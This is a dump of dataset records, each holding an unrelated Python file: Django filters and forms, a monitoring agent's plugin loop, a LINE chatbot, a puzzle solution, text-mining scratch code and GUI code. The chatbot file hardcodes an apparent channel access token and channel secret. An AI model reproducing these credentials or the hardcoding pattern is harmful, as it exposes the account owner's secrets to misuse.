a_and_b,\n ',5 XOR 6 = ', a_xor_b,\n ',5 OR 6 = ', a_or_b,\n ',5 MOV left', a_mov_left,\n ', 5 MOV right', a_mov_right)\n","sub_path":"hw1/hw1-2.py","file_name":"hw1-2.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"560263495","text":"from members.models import ItemType\nfrom .models import LineItem, PosPayment\nimport django_filters\nfrom django_filters import DateFilter, ChoiceFilter, BooleanFilter\nfrom tempus_dominus.widgets import DatePicker\n\n\ndef item_type_choices():\n choices = []\n item_types = ItemType.objects.filter(pos=True)\n for it in item_types:\n choices.append([it.id, it.description])\n return choices\n\n\nclass LineItemFilter(django_filters.FilterSet):\n\n item_type_id = ChoiceFilter(\n field_name=\"item__item_type_id\",\n label=\"Item type\",\n choices=((1, \"dummy\"),),\n empty_label=\"All\",\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.base_filters[\"item_type_id\"].extra[\"choices\"] = item_type_choices()\n return\n\n class Meta:\n model = LineItem\n fields = [\"transaction__creation_date\"]\n\n\n# class LineItemTableFilter(django_filters.FilterSet):\n# date_from = DateFilter(field_name='transaction__creation_date',\n# lookup_expr='gte',\n# label='Date from',\n# widget=DatePicker(options={'format': 'DD/MM/YYYY'})\n# )\n# date_to = DateFilter(field_name='transaction__creation_date',\n# lookup_expr='lte',\n# label='Date to',\n# widget=DatePicker(options={'format': 'DD/MM/YYYY'})\n# )\n# item_type_id = ChoiceFilter(field_name='transaction__item_type_id',\n# label='Item type',\n# choices=item_type_choices(),\n# empty_label=\"All\"\n# )\n# billed = ChoiceFilter(field_name='transaction__billed',\n# label='Invoice',\n# choices=((0, 'Not yet invoiced'),(2, 'Invoiced')),\n# empty_label='No filter'\n# )\n\n\nclass PaymentFilter(django_filters.FilterSet):\n date_from = DateFilter(\n field_name=\"transaction__creation_date\",\n lookup_expr=\"gte\",\n label=\"Date from\",\n widget=DatePicker(options={\"format\": \"DD/MM/YYYY\"}),\n )\n date_to = DateFilter(\n field_name=\"transaction__creation_date\",\n lookup_expr=\"lte\",\n label=\"Date to\",\n widget=DatePicker(options={\"format\": \"DD/MM/YYYY\"}),\n )\n billed = ChoiceFilter(\n field_name=\"transaction__billed\",\n label=\"Invoice\",\n choices=((0, \"Not yet invoiced\"), (2, \"Invoiced\")),\n empty_label=\"No filter\",\n )\n","sub_path":"pos/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"522393715","text":"from django import forms\nfrom django.forms.formsets import BaseFormSet\n\n\nclass FieldForm(forms.Form):\n \"\"\"\n For each pear of fields\n \"\"\"\n field1 = forms.CharField(max_length=100, required=False)\n field2 = forms.CharField(max_length=100, required=False)\n\n\nclass ProfileForm(forms.Form):\n \"\"\"\n user profile\n \"\"\"\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(ProfileForm, self).__init__(*args, **kwargs)\n\n self.fields['first_name'] = forms.CharField(max_length=30, initial=self.user.first_name,)\n self.fields['last_name'] = forms.CharField(max_length=30, initial=self.user.last_name,)\n # it is possible to put more fields...\n\n\nclass BaseFieldFormSet(BaseFormSet):\n def clean(self):\n \"\"\"\n Adds validation\n \"\"\"\n if any(self.errors):\n return\n\n field1s = []\n field2s = []\n duplicates = False\n\n for form in self.forms:\n if form.cleaned_data:\n field1 = form.cleaned_data['field1']\n field2 = form.cleaned_data['field2']\n\n if field1 and field2:\n if field1 in field1s:\n duplicates = True\n field1s.append(field1)\n\n if field2 in field2s:\n duplicates = True\n field2s.append(field2)\n\n if duplicates:\n raise forms.ValidationError('Unique pear of fields.')\n\n if field1 and not field2:\n raise forms.ValidationError('All links must have field1.')\n elif field2 and not field1:\n raise forms.ValidationError('All links must have field2.')\n","sub_path":"formsets/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"458558370","text":"import json, sys, logging, logging.handlers, time, pprint, itertools, traceback, collections\nfrom pathlib import Path\nimport ruxit.plugin_state_machine, ruxit.config_utils, ruxit.plugin_status_reporter\nimport ruxit.mem_tracking,ruxit.utils.fault_handling, ruxit.utils.perf_utils\nimport ruxit.utils.murmur3, ruxit.utils._logging\n\nfrom .utils.execute_every_minute import ExecuteEveryMinute\nfrom .package_utils import plugin_updater as plugin_update_mod\nfrom ruxit.plugin_status_reporter import PluginFullStatus, PluginState\nfrom ruxit.utils._logging import engine_logging\nfrom ruxit.utils.docker_helper import DockerUtils\n\n\nlogger = logging.getLogger(__name__)\n\ndef _do_nothing(self, *args, **kwargs):\n pass\n\n\nclass PluginTask:\n def __init__(self, engine, follow_up=None, timestamp=None):\n self.engine = engine\n self.follow_up = follow_up\n self.created_timestamp = timestamp\n if timestamp is None:\n self.created_timestamp = time.monotonic()\n if follow_up is None:\n self.follow_up = _do_nothing\n\n def __repr__(self):\n return \"PluginTask(engine=%s,follow_up=%s,created_timestamp=%s\" % (\n self.engine,\n self.follow_up,\n self.created_timestamp\n )\n\n\nclass PluginLoop:\n SfmStat = collections.namedtuple('SfmStat', ['cpu_usage', 'mem_used', 'exec_time'])\n def __init__(self,\n concurrent_mod,\n stop_strategy,\n report_results_strategy,\n get_metadata_strategy,\n platform_api,\n num_python_threads):\n\n self.pending_disabled = []\n self.concurrent_mod = concurrent_mod\n self.executor = self.concurrent_mod.ThreadPoolExecutor(max_workers=num_python_threads)\n\n self.step_timeout = 2\n self.shutdown_timeout = 8\n\n self.plugin_engines = []\n self.incompatible_plugins = []\n self.pending_execution = []\n self.submitted_tasks = {}\n\n self.latest_plugin_infos = []\n\n self.report_results_strategy = report_results_strategy\n self.get_metadata_strategy = get_metadata_strategy\n self.stop_strategy = stop_strategy\n self.platform_api = platform_api\n\n self.status_every_minute = ExecuteEveryMinute()\n self.sfm_every_minute = ExecuteEveryMinute()\n self.zero_counter_every_minute = ExecuteEveryMinute()\n self.plugin_reporter = ruxit.plugin_status_reporter.PluginStatusReporter(self.platform_api.external_api)\n\n self.mem_driver = ruxit.mem_tracking.TracemallocDriver(external_api=self.platform_api.external_api)\n\n log_path = self.platform_api.external_api.get_log_path()\n install_path = self.platform_api.external_api.get_install_path()\n self.fault_handler_trap = ruxit.utils.fault_handling.FaultHandlerTrap(fault_info_dir=log_path)\n self.hung_plugin_reporter = ruxit.utils.fault_handling.HungPluginsReporter(fault_info_dir=log_path)\n self.plop_driver = ruxit.utils.perf_utils.PlopDriver(external_api=self.platform_api.external_api)\n ruxit.utils.murmur3.Murmur3().initialize(self.platform_api.external_api, platform_api.is_local)\n self.run_plugins = set()\n DockerUtils.base_path = Path(install_path)\n\n def main(self):\n self._update_logging_configuration()\n self._update_plugin_metadata()\n process_mem = self._create_processmem()\n\n while self.should_run():\n time_start = time.monotonic()\n\n if not self.platform_api.external_api.should_pause():\n process_mem()\n self.one_plugin_loop_step()\n self.plop_driver.step()\n\n work_time = time.monotonic() - time_start\n time_left = self.step_timeout - work_time\n if time_left > 0:\n time.sleep(time_left)\n\n self.status_every_minute.do(\n logger.info,\n \"Plugin loop status: time_taken: %s, engines_info: %s, \",\n work_time,\n pprint.pformat([\"%s, executions:%s \" % (pe, pe.get_execution_count()) for pe in self.plugin_engines]),\n )\n\n if not self.platform_api.is_local:\n self.sfm_every_minute.do(\n self.report_self_monitoring,\n self.platform_api,\n self.plugin_engines,\n )\n self.zero_counter_every_minute.do(\n self.zero_counter,\n self.plugin_engines,\n )\n\n self.shutdown()\n\n def zero_counter(self, endpoints):\n for endpoint in endpoints:\n endpoint.device_counter = 0\n endpoint.group_counter = 0\n\n\n def report_self_monitoring(self, platform_api, plugins):\n cpu = platform_api.external_api.get_cpu_usage()\n mem = platform_api.external_api.get_mem_usage()\n execTimeList = []\n for plugin in plugins:\n if len(plugin._stats) > 0:\n pluginName = plugin.plugin_info.name + \" \" + str(plugin.config_id)\n execTime = plugin._stats[-1].end_time - plugin._stats[-1].start_time\n logger.debug(\"SFM stat: Plugin: %s, exec time=%d\", pluginName, execTime)\n execTimeList.append((pluginName, execTime))\n\n stat = self.SfmStat(cpu_usage=cpu, mem_used=mem, exec_time=execTimeList)\n platform_api.external_api.report_self_monitoring(stat)\n\n def _create_processmem(self):\n mem_driver_interval = self.platform_api.external_api.get_int_debug_flag(\n \"debugPluginAgentTracemallocIntervalNative\",\n 180\n )\n process_mem = ruxit.mem_tracking.run_on_interval_decorator(\n lambda: self.mem_driver.process_memory_usage(),\n mem_driver_interval\n )\n return process_mem\n\n def one_plugin_loop_step(self):\n self._update_logging_configuration()\n if self.platform_api.data_update():\n self.trigger_plugins_life(self.latest_plugin_infos)\n self._update_plugin_log_level()\n self.trigger_state_machines()\n\n done_futures, not_done_futures = self.concurrent_mod.wait(self.submitted_tasks.keys(), timeout=self.step_timeout)\n for done_future in done_futures:\n plugin_task = self.submitted_tasks[done_future]\n plugin_engine = plugin_task.engine\n plugin_engine.execution_timeout = False\n del self.submitted_tasks[done_future]\n try:\n # in order to catch exceptions originating from plugins\n done_future.result()\n plugin_task.follow_up(plugin_engine)\n except Exception as ex:\n plugin_engine.get_logger().info(\"plugin %s threw exception %s\", plugin_engine, ex)\n\n if plugin_engine not in self.pending_disabled:\n self.pending_execution.append(plugin_engine)\n else:\n self.pending_disabled.remove(plugin_engine)\n\n self.hung_plugin_reporter.report_hung_tasks(self.submitted_tasks)\n\n self.gather_stats()\n\n self.report_plugins_status()\n\n return done_futures, not_done_futures\n\n def _report_plugin_results(self, plugin_engine):\n result = plugin_engine.flush_results()\n if result is None:\n plugin_engine.get_logger().warn(\"No results available from plugin_engine %s\" % plugin_engine)\n return\n if plugin_engine.get_logger().isEnabledFor(logging.DEBUG):\n plugin_engine.get_logger().info(\"Plugin finished engine=%s, result=%s\", plugin_engine, pprint.pformat(result))\n \n if not plugin_engine.is_fast_check:\n try:\n self.report_results_strategy(\n result.measurements,\n result.properties,\n result.events.events\n )\n except Exception as ex:\n plugin_engine.get_logger().info(\"Report results for plugin %s threw exception %s\", plugin_engine, ex)\n exception_info = sys.exc_info()\n plugin_engine.set_full_status(PluginState.ERROR_UNKNOWN, exception_info)\n\n self.platform_api.additional_report_step(plugin_engine)\n else:\n logging.info(\"Results are not reported - fast check.\")\n if not self.platform_api.is_local:\n plugin_engine.topology_builder._groups = {}\n plugin_engine.results_builder.reset_result()\n\n\n def _update_plugin_metadata(self):\n updated_metadata = self.get_metadata_strategy()\n if self.platform_api.external_api.resolve_conflicts_flag():\n logger.info('Installing plugins with conflict resolution')\n plugin_updater = plugin_update_mod.PluginUpdater(\n sys.path,\n updated_metadata\n )\n plugin_entries = plugin_updater.install_plugins()\n self.incompatible_plugins = plugin_updater.incompatible_plugins\n logger.info('========= INCOMPATIBLE PLUGINS =========')\n logger.info(pprint.pformat(self.incompatible_plugins))\n logger.info('='*40)\n logger.info('*'*40)\n logger.info(plugin_entries)\n logger.info('*'*40)\n self.latest_plugin_infos = plugin_entries\n sys.path.extend([entry.directory for entry in plugin_entries])\n logger.info(\"sys.path after installing plugins: %r\", sys.path)\n else:\n logger.info(\"Installing plugins using old mechanism (no conflict resolution)\")\n self.latest_plugin_infos = [\n plugin_update_mod.PluginInfo(json_data=json.loads(mt[1]), directory=mt[0]) for mt in updated_metadata\n ]\n for directory_metadata in updated_metadata:\n if directory_metadata[0] not in sys.path:\n sys.path.append(directory_metadata[0])\n logger.info('appending %s to sys.path', directory_metadata[0])\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(\"Latest plugin metadata: %s\", pprint.pformat(self.latest_plugin_infos))\n\n def trigger_plugins_life(self, plugin_metadata):\n to_activate, to_deactivate = self.platform_api.select_plugins(self.plugin_engines, plugin_metadata)\n plugins_changed = False\n for engine_activation_context, plugin_info in to_activate:\n try:\n plugins_changed = True\n\n engine = self.platform_api.create_engine(plugin_info, engine_activation_context)\n logger.info(\n \"Activating plugin engine: %s \\ninfo: %s\",\n engine,\n plugin_info\n )\n if engine.get_logger().isEnabledFor(logging.DEBUG):\n engine.get_logger().debug(\"Activated engine full metadata: %s\", pprint.pformat(plugin_info.json_data))\n self.pending_execution.append(engine)\n self.plugin_engines.append(engine)\n self.run_plugins.add(engine.metadata[\"name\"])\n except:\n logger.exception (\"Unable to create plugin %s because of %s\",\n 'plugin_info.json_data.metadata[\"source\"][\"className\"]',\n sys.exc_info())\n\n for inactive_engine in to_deactivate:\n plugins_changed = True\n inactive_engine.get_logger().info(\n \"Removing plugin engine: %s, activation_context: %s\",\n inactive_engine,\n inactive_engine.activation_context\n )\n self.plugin_engines.remove(inactive_engine)\n self.plugin_reporter.remove_engine(inactive_engine)\n if inactive_engine in self.pending_execution:\n self.pending_execution.remove(inactive_engine)\n else:\n self.pending_disabled.append(inactive_engine)\n\n if plugins_changed:\n logger.info(\"active plugins changed\")\n\n def trigger_state_machines(self):\n new_pending_execution = []\n for plugin_engine in self.pending_execution:\n future = None\n follow_up = None\n new_config, fast_check_id, enabled = self.platform_api.get_plugin_config(plugin_engine, self.latest_plugin_infos)\n\n if fast_check_id:\n plugin_engine.request_fast_check(fast_check_id)\n plugin_uninitialized = not plugin_engine.is_initialized()\n if enabled and plugin_engine.ready_for_set_config(new_config, fast_check_id):\n future = self.executor.submit(\n plugin_engine.event_set_configuration,\n new_config\n )\n follow_up = self._report_plugin_results\n elif new_config is not None and not enabled and plugin_engine.state != PluginState.DISABLED:\n future = self.executor.submit(plugin_engine.event_disable)\n elif new_config is None and not plugin_uninitialized:\n future = self.executor.submit(plugin_engine.event_uninitialize)\n elif plugin_engine.ready_for_measure():\n future = self.executor.submit(plugin_engine.event_gather_measurements)\n follow_up = self._report_plugin_results\n\n if future is not None:\n self.submitted_tasks[future] = PluginTask(plugin_engine, follow_up=follow_up)\n else:\n new_pending_execution.append(plugin_engine)\n\n self.pending_execution = new_pending_execution\n\n def shutdown(self):\n logger.info(\"Shutting down plugin loop\")\n not_cancelled = []\n cancelled = []\n\n # cancel plugins that can be cancelled\n for future in self.submitted_tasks:\n cancel_result = future.cancel()\n if not cancel_result:\n not_cancelled.append(future)\n else:\n cancelled.append(future)\n # wait for all executing plugins\n done, not_done = self.concurrent_mod.wait(not_cancelled, timeout=self.shutdown_timeout)\n\n # schedule closing of all plugins\n shutdown_tasks = []\n for future in itertools.chain(cancelled, done):\n plugin_engine = self.submitted_tasks[future].engine\n future = self.executor.submit(plugin_engine.shutdown)\n shutdown_tasks.append(future)\n # wait for them to shut down\n shut_down, not_shut_down = self.concurrent_mod.wait(shutdown_tasks, timeout=self.shutdown_timeout)\n\n self.executor.shutdown(wait=False)\n logger.info(\"Plugin loop shutdown finished\")\n\n def gather_stats(self):\n for engine in self.plugin_engines:\n if engine.get_logger().isEnabledFor(logging.DEBUG):\n engine.get_logger().debug('Plugin Stats for engine %s: \\n%s', engine, pprint.pformat(engine.get_stats()))\n\n def should_run(self):\n return next(self.stop_strategy) and self.platform_api.external_api.plugins_enabled()\n\n def report_plugins_status(self):\n not_existing_plugins = self.platform_api.get_not_existing_plugins(self.plugin_engines)\n self.plugin_reporter.report_status(\n engines = reversed(self.plugin_engines), \n incompatible_plugins = self.incompatible_plugins,\n not_existing_plugins = not_existing_plugins)\n\n def _update_logging_configuration(self):\n # we're setting this on root logger, so all other loggers are affected\n if self. platform_api.external_api.is_debug_logging_enabled() is True:\n logging.getLogger().setLevel(logging.DEBUG)\n else:\n logging.getLogger().setLevel(logging.INFO)\n\n\n def _update_plugin_log_level(self):\n for plugin_name in self.run_plugins:\n log_level = self.platform_api.external_api.get_str_debug_flag('debugRPACustomLogLevel.{}'.format(plugin_name), 'NONE')\n if log_level != 'NONE':\n engine_logging.set_log_level(plugin_name, log_level)\n\n\ndef dump_stack():\n code = []\n for threadId, stack in sys._current_frames().items():\n code.append(\"\\n# Thread: %d\" % (threadId))\n for filename, lineno, name, line in traceback.extract_stack(stack):\n code.append('File: \"%s\", line %d, in %s' % (filename, lineno, name))\n if line:\n code.append(\" %s\" % (line.strip()))\n logger.info(\"\\n\".join(code))\n return code\n\n\ndef main(stop_strategy, report_results_strategy, get_metadata_strategy, platform_api, num_python_threads):\n import concurrent.futures\n import concurrent.futures.thread\n import atexit\n atexit.unregister(concurrent.futures.thread._python_exit)\n loop = PluginLoop(\n stop_strategy=stop_strategy,\n concurrent_mod=concurrent.futures,\n report_results_strategy=report_results_strategy,\n get_metadata_strategy=get_metadata_strategy,\n platform_api=platform_api,\n num_python_threads=num_python_threads)\n loop.main()\n","sub_path":"venv/Lib/site-packages/ruxit/plugin_loop.py","file_name":"plugin_loop.py","file_ext":"py","file_size_in_byte":17067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496339433","text":"def get_dict(file):\r\n _dict = {}\r\n file = file.split('[')[0]\r\n try:\r\n file = open(file,\"rb\").readlines()\r\n except FileNotFoundError:\r\n #print('[!] Couldn\\'t open file \\'{}\\''.format(file))\r\n return False \r\n for line_number, line in enumerate(file):\r\n _dict[line_number] = line\r\n return _dict\r\n\r\n\r\ndef get_index(file):\r\n _dict = get_dict(file)\r\n if len(file.split('[')) == 1:\r\n index = len(_dict)\r\n return index\r\n elif len(file.split('[')) == 2:\r\n index = file.split('[')[-1][:-1]\r\n return int(index)\r\n\r\n\r\n\r\ndef cat(file):\r\n try:\r\n dex = get_index(file)\r\n except:\r\n print('[!] Couldn\\'t open file \\'{}\\''.format(file))\r\n return\r\n for x in range(13):\r\n if x < dex:\r\n try:\r\n print(get_dict(file)[x].decode('utf-8'))\r\n except UnicodeDecodeError:\r\n print(\"[!] Cat can't print binary data\")\r\n \r\n \r\n\r\n","sub_path":"src/modules/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45999252","text":"import threading\nfrom queue import Queue\nimport logging\nimport time\n\nfrom asu.utils.config import Config\nfrom asu.utils.database import Database\nfrom asu.utils.worker import Worker\n\n\nclass Boss(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.log = logging.getLogger(__name__)\n self.config = Config()\n self.database = Database(self.config)\n self.build_queue = Queue(1)\n\n def run(self):\n workers = []\n for worker_location in self.config.get(\"worker\", []):\n worker = Worker(worker_location, \"image\", self.build_queue)\n worker.start()\n workers.append(worker)\n\n self.log.info(\"Active workers are %s\", workers)\n\n while True:\n build_job = self.database.get_build_job()\n if build_job:\n self.log.info(\"Found build job %s\", build_job)\n self.build_queue.put(build_job)\n else:\n time.sleep(10)\n","sub_path":"asu/utils/boss.py","file_name":"boss.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533089669","text":"import os\r\nfrom flask import Flask, request, abort\r\n\r\nfrom linebot import (\r\n LineBotApi, WebhookHandler\r\n)\r\nfrom linebot.exceptions import (\r\n InvalidSignatureError\r\n)\r\nfrom linebot.models import *\r\n\r\napp = Flask(__name__)\r\n# Channel Access Token\r\nline_bot_api = LineBotApi('u2w+d2uomuR0PkCtZLd2DRzjjgCs8fhVxOM8dlOrFoaOU4j5lgk9erJajAZvkMVSjirT4yAAU08AqVhhawonSwocR6P2NJkCVTFVl1oFAr1M11sA/2YGsOOSl2vL4bstW4eK9D7RYiwpN6InudEazwdB04t89/1O/w1cDnyilFU=')\r\n# Channel Secret\r\nhandler = WebhookHandler('6b44bac03bc6cb956d318da6a4aecc65')\r\n\r\n# 監聽所有來自 /callback 的 Post Request\r\n@app.route(\"/callback\", methods=['POST'])\r\ndef callback():\r\n # get X-Line-Signature header value\r\n signature = request.headers['X-Line-Signature']\r\n # get request body as text\r\n body = request.get_data(as_text=True)\r\n app.logger.info(\"Request body: \" + body)\r\n # handle webhook body\r\n try:\r\n handler.handle(body, signature)\r\n except InvalidSignatureError:\r\n abort(400)\r\n return 'OK'\r\n\r\n# 處理訊息 \r\n\r\n@handler.add(MessageEvent, message=TextMessage)\r\ndef handle_message(event):\r\n msg = event.message.text.lower()\r\n\r\n if msg == 'hi':\r\n message = TemplateSendMessage(\r\n alt_text='Buttons template',\r\n template=ButtonsTemplate(\r\n thumbnail_image_url='https://i0.wp.com/www.womstation.com/wp-content/uploads/2018/11/%E9%9F%93%E5%9C%8B4.png?w=1280&ssl=1',\r\n title='第一個小功能',\r\n text='測試雞肋功能',\r\n actions=[\r\n URITemplateAction(\r\n label='熱門youtube',\r\n uri='https://www.youtube.com/feed/trending'\r\n ),\r\n URITemplateAction(\r\n label='小新聞',\r\n uri='https://news.google.com/?hl=zh-TW&tab=wn1&gl=TW&ceid=TW:zh-Hant'\r\n ),\r\n URITemplateAction(\r\n label='IGIG',\r\n uri='https://www.instagram.com/?hl=zh-tw'\r\n ),\r\n\r\n ]\r\n )\r\n )\r\n line_bot_api.reply_message(event.reply_token, message)\r\n\r\n else:\r\n \tmessage = TextSendMessage(text='請輸入hi')\r\n \tline_bot_api.reply_message(event.reply_token, message)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n port = int(os.environ.get('PORT', 5000))\r\n app.run(host='0.0.0.0', port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"427543401","text":"# --- Part Two ---\n# It's getting pretty expensive to fly these days - not because of ticket prices, but because of the ridiculous number of bags you need to buy!\n\n# Consider again your shiny gold bag and the rules from the above example:\n\n# faded blue bags contain 0 other bags.\n# dotted black bags contain 0 other bags.\n# vibrant plum bags contain 11 other bags: 5 faded blue bags and 6 dotted black bags.\n# dark olive bags contain 7 other bags: 3 faded blue bags and 4 dotted black bags.\n# So, a single shiny gold bag must contain 1 dark olive bag (and the 7 bags within it) plus 2 vibrant plum bags (and the 11 bags within each of those): 1 + 1*7 + 2 + 2*11 = 32 bags!\n\n# Of course, the actual rules have a small chance of going several levels deeper than this example; be sure to count all of the bags, even if the nesting becomes topologically impractical!\n\n# Here's another example:\n\n# shiny gold bags contain 2 dark red bags.\n# dark red bags contain 2 dark orange bags.\n# dark orange bags contain 2 dark yellow bags.\n# dark yellow bags contain 2 dark green bags.\n# dark green bags contain 2 dark blue bags.\n# dark blue bags contain 2 dark violet bags.\n# dark violet bags contain no other bags.\n# In this example, a single shiny gold bag must contain 126 other bags.\n\n# How many individual bags are required inside your single shiny gold bag?\n\ninputFile = 'day7-input.txt'\nbagColor = 'shiny gold'\nmultiple = 1\n\ndef fileInput():\n f = open(inputFile, 'r')\n with open(inputFile) as f:\n read_data = f.read().split('\\n')\n f.close()\n\n return read_data\n\n# bag: {innerbags[0]:count[0],...,innerBag[x]:count[x]}\n# {dark orange: {'bright white': 3, 'muted yellow': 4}}\n# {bright white: {'shiny gold': 1}}\ndef organizeBags(bags):\n bagRule = {}\n for rule in bags:\n count = 0\n bagKey = ''\n bagVal = {}\n \n rule = rule.split('contain ')\n for bag in rule:\n bag = bag.split(', ')\n for string in bag:\n string = string.replace(' bags','')\n string = string.replace(' bag','')\n string = string.rstrip(' .')\n if string[0].isdigit():\n string = string.split(' ',1)\n bagVal.update({string[1]:int(string[0])})\n if count == 0:\n count = count + 1\n bagKey = string\n\n bagRule.update({bagKey:bagVal})\n return bagRule\n\n\n#{'light red': {'bright white': 1, 'muted yellow': 2}, 'dark orange': {'bright white': 3, 'muted yellow': 4}, 'bright white': {'shiny gold': 1}, 'muted yellow': {'shiny gold': 2, 'faded blue': 9}, 'shiny gold': {'dark olive': 1, 'vibrant plum': 2}, 'dark olive': {'faded blue': 3, 'dotted black': 4}, 'vibrant plum': {'faded blue': 5, 'dotted black': 6}, 'faded blue': {}, 'dotted black': {}} \ndef findBags(bagColor, bags, multiple):\n count = 0\n if not bags.get(bagColor):\n return multiple\n for bag in bags.get(bagColor):\n count = count + multiple * findBags(bag, bags, bags.get(bagColor).get(bag))\n return count + multiple\n\nif __name__ == \"__main__\":\n data = fileInput()\n orgBags = organizeBags(data)\n print(findBags(bagColor,orgBags,multiple)-1)","sub_path":"day7/day7-2.py","file_name":"day7-2.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"53566","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom textblob import Word\nfrom textblob import TextBlob \n\n\n\ns1 ='State of Japan is an island country in East Asia.'\ns2 ='Located in the Pacific Ocean, it lies off the eastern coast of the Asian continent and stretches from the Sea of Okhotsk in the north to the East China Sea and the Philippine Sea in the south'\ns3= 'The kanji that make up Japans name mean sun origin, and it is often called the Land of the Rising Sun.'\ns4='The Greater Tokyo Area is the most populous metropolitan area in the world with over 38 million people.'\n\nt1 =TextBlob(s1)\nt2 =TextBlob(s2)\nt3 =TextBlob(s3)\nt4 =TextBlob(s4)\n\ndocument = [t1,t2,t3,t4]\nprint(document)\ndoclist=[]\nfor doc in document:\n WordList = doc.words\n for word in WordList :\n doclist.append(word)\n \ndoclist = WordList(doclist)\nprint(doclist)\n\ntflist=[]\nfor word in doclist:\n tf = doclist.words.count(word)\n tflist.append(tf)\n \nprint(tflist)\n\n'''\n\nfor doc in document:\n WordList = doc.words\n for word in WordList :\n tf = doc.words.count(word)\n tflist.append(tf)\n print('{0} -- {1} '.format(word,str(tf)))\n \nprint('=============================') \n\ndataset =[s1,s2,s3,s4]\n\nprint(dataset)\nprint(tflist)\n\ntfidf = TfidfVectorizer(stop_words='english')\n\ntfidf.fit(dataset)\n#print(tfidf.vocabulary_)\n\ndata = tfidf.vocabulary_\n\n#print(data.keys())\n#print(data.values())\ndatalist =[]\nfor key in data.keys():\n print('{0} {1}'.format(key,data[key]))\n datalist.append(data[key])\n\nprint(datalist)\nfrom sklearn.cluster import KMeans\n\nprint(len(tflist))\nprint(len(datalist))\n\n#x = list(zip(tflist,datalist))\nmodel = KMeans(n_clusters=3)\n\nmodel.fit_transform(tfidf)\nimport matplotlib.pyplot as plt\n\nplt.scatter(tfidf,datalist,c =tflist)\nplt.show()\n\n'''\n","sub_path":"Day7/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"478212537","text":"# Python\nimport os\nfrom functools import partial\nimport logging\nlogger = logging.getLogger(__name__)\n\n# SciPy\nimport numpy\nimport h5py\n\n# PyQt\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QApplication, QAbstractItemView, QFileDialog, QMessageBox, QCursor\nfrom PyQt4 import uic\n\n# lazyflow\nfrom lazyflow.operators.generic import OpSubRegion\n\n# volumina\nfrom volumina.utility import PreferencesManager\n\n# ilastik\nfrom ilastik.widgets.featureTableWidget import FeatureEntry\nfrom ilastik.widgets.featureDlg import FeatureDlg\nfrom ilastik.utility import bind\nfrom volumina.utility import encode_from_qstring\nfrom ilastik.applets.layerViewer.layerViewerGui import LayerViewerGui\nfrom ilastik.config import cfg as ilastik_config\n\nfrom ilastik.applets.base.applet import DatasetConstraintError\n\n#===----------------------------------------------------------------------------------------------------------------===\n#=== FeatureSelectionGui ===\n#===----------------------------------------------------------------------------------------------------------------===\n\nclass FeatureSelectionGui(LayerViewerGui):\n \"\"\"\n \"\"\"\n \n # Constants \n ScalesList = [0.3, 0.7, 1, 1.6, 3.5, 5.0, 10.0]\n\n # Map feature groups to lists of feature IDs\n FeatureGroups = [ ( \"Color/Intensity\", [ \"GaussianSmoothing\" ] ),\n ( \"Edge\", [ \"LaplacianOfGaussian\", \"GaussianGradientMagnitude\", \"DifferenceOfGaussians\" ] ),\n ( \"Texture\", [ \"StructureTensorEigenvalues\", \"HessianOfGaussianEigenvalues\" ] ) ]\n\n # Map feature IDs to feature names\n FeatureNames = { 'GaussianSmoothing' : 'Gaussian Smoothing',\n 'LaplacianOfGaussian' : \"Laplacian of Gaussian\",\n 'GaussianGradientMagnitude' : \"Gaussian Gradient Magnitude\",\n 'DifferenceOfGaussians' : \"Difference of Gaussians\",\n 'StructureTensorEigenvalues' : \"Structure Tensor Eigenvalues\",\n 'HessianOfGaussianEigenvalues' : \"Hessian of Gaussian Eigenvalues\" }\n\n ###########################################\n ### AppletGuiInterface Concrete Methods ###\n ###########################################\n \n def appletDrawer(self):\n return self.drawer\n\n def viewerControlWidget(self):\n return self._viewerControlWidget\n\n def stopAndCleanUp(self):\n super(FeatureSelectionGui, self).stopAndCleanUp()\n\n # Unsubscribe to all signals\n for fn in self.__cleanup_fns:\n fn()\n\n # (Other methods already provided by our base class)\n\n ###########################################\n ###########################################\n \n def __init__(self, parentApplet, topLevelOperatorView):\n \"\"\"\n \"\"\"\n self.topLevelOperatorView = topLevelOperatorView\n super(FeatureSelectionGui, self).__init__(parentApplet, topLevelOperatorView, crosshair=False)\n self.parentApplet = parentApplet\n \n self.__cleanup_fns = []\n\n self.topLevelOperatorView.SelectionMatrix.notifyDirty( bind(self.onFeaturesSelectionsChanged) )\n self.topLevelOperatorView.FeatureListFilename.notifyDirty( bind(self.onFeaturesSelectionsChanged) )\n self.__cleanup_fns.append( partial( self.topLevelOperatorView.SelectionMatrix.unregisterDirty, bind(self.onFeaturesSelectionsChanged) ) )\n self.__cleanup_fns.append( partial( self.topLevelOperatorView.FeatureListFilename.unregisterDirty, bind(self.onFeaturesSelectionsChanged) ) )\n\n self.onFeaturesSelectionsChanged()\n\n\n # Init feature dialog\n 